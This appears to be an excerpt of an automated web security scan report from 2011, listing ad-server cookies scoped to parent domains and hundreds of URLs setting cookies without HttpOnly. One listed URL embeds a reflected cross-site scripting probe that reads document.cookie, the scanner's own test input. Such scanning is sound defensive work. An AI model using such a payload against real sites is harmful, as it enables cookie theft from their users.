Set-Cookie: er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:48:59 GMT; Path=/
Location: http://voken.eyereturn.com/pb/get?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=&params=8830366303
Content-Length: 0
Date: Fri, 28 Jan 2011 23:48:58 GMT
Connection: close
Server: eyeReturn Ad Serveri 6

10.140. http://voken.eyereturn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://voken.eyereturn.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

erTok="AwAAAADLogMAELggAAIAAByjAwCUtyAAAQAAUX0DAJW3IAABAAAgowMAELggAAEAAA=="; Domain=.eyereturn.com; Expires=Mon, 28-Jan-2013 01:52:40 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?233374&click=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000943795/cstr=91575939=_4d4372e7,6205162343,766161^943795^1183^0,1_/xsxdata=$xsxdata/bnum=91575939/optn=64?trg=&params=6205162343 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAAUX0DAJW3IAABAAA="; cmggl=1; er_guid=0253E4A4-2BB0-7708-5C00-B99AAC47FE39

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV"
Set-Cookie: erTok="AwAAAADLogMAELggAAIAAByjAwCUtyAAAQAAUX0DAJW3IAABAAAgowMAELggAAEAAA=="; Domain=.eyereturn.com; Expires=Mon, 28-Jan-2013 01:52:40 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:52:40 GMT
Server: eyeReturn Ad Server
Content-Length: 14762

//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved //
er_CID='7054';er_SegID='233375';er_imgSrc='http://resources.eyereturn.com/7054/007054_polite_728x90_f_30_v1.swf';er_token
...[SNIP]...

10.141. http://voken.eyereturn.com/pb/get previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://voken.eyereturn.com
Path:	/pb/get

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAA"; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:48:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pb/get?233369&click=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000943794/cstr=758797=_4d43560a,8830366303,766159^943794^1183^0,1_/xsxdata=$xsxdata/bnum=758797/optn=64?trg=&params=8830366303 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmggl=1; er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSAo PSDa OUR STP IND UNI COM NAV"
Set-Cookie: erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAA"; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:48:59 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 23:48:58 GMT
Connection: close
Server: eyeReturn Ad Serveri 6
Content-Length: 14757

//<!CDATA[// Copyright eyeReturn Marketing Inc., 2011, All Rights Reserved //
er_CID='7054';er_SegID='233370';er_imgSrc='http://resources.eyereturn.com/7054/007054_polite_300x250_f_30_v1.swf';er_toke
...[SNIP]...

10.142. http://voken.eyereturn.com/pix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://voken.eyereturn.com
Path:	/pix

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAAUX0DAJW3IAABAAA="; Domain=.eyereturn.com; Expires=Sun, 27-Jan-2013 23:49:09 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pix?223686 HTTP/1.1
Host: voken.eyereturn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmggl=1; er_guid=AB15549D-BD77-4F41-E5E1-E44D3AF016E4; erTok="AwAAAADLogMAlLcgAAEAAByjAwCUtyAAAQAA"

Response

10.143. http://xads.zedo.com/ads2/c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://xads.zedo.com
Path:	/ads2/c

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:31 GMT; DOMAIN=.zedo.com
ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:31 GMT;DOMAIN=.zedo.com;path=/;
PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:31 GMT; DOMAIN=.zedo.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 15:06:31 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:31 GMT; DOMAIN=.zedo.com
Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:31 GMT;DOMAIN=.zedo.com;path=/;
Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:31 GMT; DOMAIN=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/
Vary: Accept-Encoding
Content-Length: 402
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/
...[SNIP]...

11. Cookie without HttpOnly flag set previous next
There are 577 instances of this issue:

http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7
http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7
http://ads.adxpose.com/ads/ads.js
http://ads.adxpose.com/ads/tag.js
http://ads2.adbrite.com/favicon.ico
http://base.liveperson.net/visitor/addons/deploy.asp
http://base.liveperson.net/visitor/addons/deploy.asp
http://boston30.autochooser.com/results.asp
http://event.adxpose.com/event.flow
http://imlive.com/homepagems3.asp
http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f
http://local.nissanusa.com/zip.aspx
http://support.moxiesoft.com/
http://twitter.com/
http://twitter.com/247realmedia
http://twitter.com/AddThis
http://twitter.com/Applebees
http://twitter.com/AshieApple
http://twitter.com/Beckett_News
http://twitter.com/BosHerald_Edge/
http://twitter.com/ChrisLambton13
http://twitter.com/ConanOBrien
http://twitter.com/DustinPedroia15
http://twitter.com/ExpertDan
http://twitter.com/GQMagazine
http://twitter.com/Gr8BosFoodBank
http://twitter.com/Harvard
http://twitter.com/Jarvis_Green
http://twitter.com/JennyMcCarthy
http://twitter.com/John_W_Henry
http://twitter.com/KaseyRKahl
http://twitter.com/KhloeKardashian
http://twitter.com/KimKardashian
http://twitter.com/Late_Show
http://twitter.com/LibertyHotel
http://twitter.com/Michael_Joseph
http://twitter.com/Michael_Joseph/status/30390775099424770
http://twitter.com/Michael_Joseph/status/30750905452204032
http://twitter.com/Michael_Joseph/status/30790097846673409
http://twitter.com/MittRomney
http://twitter.com/NewYorkPost
http://twitter.com/Nicole_114
http://twitter.com/Oprah
http://twitter.com/PageLines
http://twitter.com/PageLines/status/27898822361354240
http://twitter.com/PhantomGourmet
http://twitter.com/Prucenter
http://twitter.com/PureADK
http://twitter.com/ROBERTPLANT
http://twitter.com/RealLamarOdom
http://twitter.com/RobertDuffy
http://twitter.com/ScampoLiberty
http://twitter.com/Script_Junkie
http://twitter.com/Sean_P_Doyle
http://twitter.com/Servigistics
http://twitter.com/ShaunieONeal
http://twitter.com/Simply_b06
http://twitter.com/Simply_b06/status/29173383425949696
http://twitter.com/Siobhan_Magnus
http://twitter.com/SlexAxton
http://twitter.com/StarWrit
http://twitter.com/Support
http://twitter.com/Svantasukhai
http://twitter.com/THE_REAL_SHAQ
http://twitter.com/TV38Boston
http://twitter.com/TechCrunch
http://twitter.com/TheKateBosworth
http://twitter.com/Trackgals
http://twitter.com/Trackgals/
http://twitter.com/_juliannemoore
http://twitter.com/about
http://twitter.com/about/contact
http://twitter.com/about/resources
http://twitter.com/account/complete
http://twitter.com/account/profile_image/malsup
http://twitter.com/account/resend_password
http://twitter.com/ajpiano
http://twitter.com/androidnewsblog
http://twitter.com/backstreetboys
http://twitter.com/benmezrich
http://twitter.com/bennadel
http://twitter.com/bostonherald
http://twitter.com/business
http://twitter.com/cjronson
http://twitter.com/cowboy
http://twitter.com/creationix
http://twitter.com/dandenney
http://twitter.com/danwrong
http://twitter.com/davevogler
http://twitter.com/deionbranch84
http://twitter.com/dougneiner
http://twitter.com/ebello
http://twitter.com/ericmmartin
http://twitter.com/ericmmartin/status/30128016856195073
http://twitter.com/favorites/14594657.rss
http://twitter.com/favorites/toptweets.json
http://twitter.com/gercheq
http://twitter.com/greenRAYn20
http://twitter.com/harvardlampoon
http://twitter.com/j_hollender
http://twitter.com/j_hollender/status/28168027493105664
http://twitter.com/j_hollender/status/28175738595180544
http://twitter.com/j_hollender/status/28205461161377793
http://twitter.com/jayleno
http://twitter.com/jbchang
http://twitter.com/jobs
http://twitter.com/joedwinell/
http://twitter.com/joemccann
http://twitter.com/jordanknight
http://twitter.com/kennychesney
http://twitter.com/kfaulk33
http://twitter.com/lapubell
http://twitter.com/lapubell/status/28131682842312704
http://twitter.com/lindapizzuti
http://twitter.com/login
http://twitter.com/malsup
http://twitter.com/malsup/favorites
http://twitter.com/malsup/followers
http://twitter.com/malsup/following
http://twitter.com/malsup/lists/memberships
http://twitter.com/malsup/status/28104072506638336
http://twitter.com/malsup/status/28148269980852225
http://twitter.com/malsup/status/28172705220009984
http://twitter.com/malsup/status/28172927228706816
http://twitter.com/malsup/status/28176483855896578
http://twitter.com/malsup/status/28206363616215040
http://twitter.com/malsup/status/28450557672824832
http://twitter.com/malsup/status/28451243869339648
http://twitter.com/malsup/status/29343613573926913
http://twitter.com/malsup/status/29343882311372800
http://twitter.com/malsup/status/29510556067041280
http://twitter.com/malsup/status/29705355999055872
http://twitter.com/malsup/status/30065585396121601
http://twitter.com/malsup/status/30103594925555712
http://twitter.com/malsup/status/30232367046074369
http://twitter.com/malsup/status/30417132269346816
http://twitter.com/malsup/status/30418291201679360
http://twitter.com/malsup/status/30442842241376256
http://twitter.com/malsup/status/30772839023910912
http://twitter.com/malsup/status/30791740717801472
http://twitter.com/mariamenounos
http://twitter.com/mattbanks
http://twitter.com/mattbanks/status/28168049634844672
http://twitter.com/mennovanslooten
http://twitter.com/messengerpost
http://twitter.com/miketaylr
http://twitter.com/miketaylr/status/28450462860574722
http://twitter.com/moxiesoft
http://twitter.com/onlyjazz
http://twitter.com/onlyjazz/status/29924505002446849
http://twitter.com/oschina
http://twitter.com/oschina/status/28102821484171264
http://twitter.com/oschina/status/30099933486915584
http://twitter.com/privacy
http://twitter.com/profile/not_logged_in/malsup
http://twitter.com/rachbarnhart
http://twitter.com/rem
http://twitter.com/rickrussie
http://twitter.com/rickrussie/status/28548182396903424
http://twitter.com/roctimo
http://twitter.com/roctimo/status/29669358812790784
http://twitter.com/rwaldron
http://twitter.com/ryanolson
http://twitter.com/scott_gonzalez
http://twitter.com/search
http://twitter.com/sentience
http://twitter.com/sessions/destroy
http://twitter.com/share
http://twitter.com/signup
http://twitter.com/simplemodal
http://twitter.com/sitepointdotcom
http://twitter.com/slaterusa
http://twitter.com/slaterusa/status/28450023532396544
http://twitter.com/statuses/user_timeline/14594657.rss
http://twitter.com/stubbornella
http://twitter.com/thehomeorg
http://twitter.com/tos
http://twitter.com/townsandtrails
http://twitter.com/travis
http://twitter.com/tylerseguin92
http://twitter.com/waynecountylife
http://twitter.com/webandy
http://twitter.com/webandy/status/30434889127960577
http://twitter.com/widgets
http://twitter.com/zonajones
http://www.berkshireeagle.com/
http://www.collegeanduniversity.net/herald/
http://www.dominionenterprises.com/main/do/Privacy_Policy
http://www.dominionenterprises.com/main/do/Terms_of_Use
http://www.paperg.com/jsfb/embed.php
http://www.parker-software.com/forum/
http://www.screenthumbs.com/
http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/
http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/
http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r
http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6
http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk
http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/
http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/
http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r
http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/
http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r
http://a.tribalfusion.com/i.cid
http://a.tribalfusion.com/j.ad
http://ad.afy11.net/ad
http://ad.doubleclick.net/click
http://ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6
http://ad.doubleclick.net/jump/N6103.135388.BIZO/B5185769.6
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/pixel.htm
http://ads.roiserver.com/click
http://adsfac.us/ag.asp
http://adsfac.us/link.asp
http://adsfac.us/link.asp
http://amch.questionmarket.com/adsc/d791689/21/39823749/decide.php
http://ar.imlive.com/
http://ar.imlive.com/waccess/
http://ar.voicefive.com/b/wc_beacon.pli
http://ar.voicefive.com/bmx3/broker.pli
http://ar.voicefive.com/bmx3/broker.pli
http://ar.voicefive.com/bmx3/broker.pli
http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/r
http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90
http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90
http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90
http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90
http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1940003036/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1419206302/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1687741401/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/17382567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/169827066/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/1819507567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/2037650882/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/334085935/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/636403816/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/670623313/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
http://b3.mookie1.com/favicon.ico
http://base.liveperson.net/hc/5296924/
http://base.liveperson.net/hc/5296924/
